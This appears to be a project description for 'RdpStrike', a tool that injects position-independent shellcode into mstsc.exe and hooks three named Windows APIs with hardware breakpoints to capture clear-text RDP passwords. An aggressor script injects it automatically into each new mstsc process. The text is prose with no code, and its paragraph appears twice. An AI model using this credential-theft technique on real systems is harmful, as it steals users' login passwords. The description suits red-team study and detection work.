RdpStrike
Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP
The RdpStrike is basically a mini project I built to dive deep into Positional Independent Code (PIC) referring to a blog post, chained with RdpThief tool. The project aims to extract clear text passwords from mstsc.exe, and the shellcode uses Hardware Breakpoint to hook APIs. It is a complete positional independent code, and when the shellcode injects into the mstsc.exe process, it is going to put Hardware Breakpoint onto three different APIs (SspiPrepareForCredRead, CryptProtectMemory, and CredIsMarshaledCredentialW), ultimately capturing any clear-text credentials and then saving them to a file. An aggressor script makes sure to monitor for new processes; if the process mstsc is spawned, it injects the shellcode into it.
Positional Independent Code to extract clear text password from mstsc.exe using API Hooking via HWBP
The RdpStrike is basically a mini project I built to dive deep into Positional Independent Code (PIC) referring to a blog post, chained with RdpThief tool. The project aims to extract clear text passwords from mstsc.exe, and the shellcode uses Hardware Breakpoint to hook APIs. It is a complete positional independent code, and when the shellcode injects into the mstsc.exe process, it is going to put Hardware Breakpoint onto three different APIs (SspiPrepareForCredRead, CryptProtectMemory, and CredIsMarshaledCredentialW), ultimately capturing any clear-text credentials and then saving them to a file. An aggressor script makes sure to monitor for new processes; if the process mstsc is spawned, it injects the shellcode into it.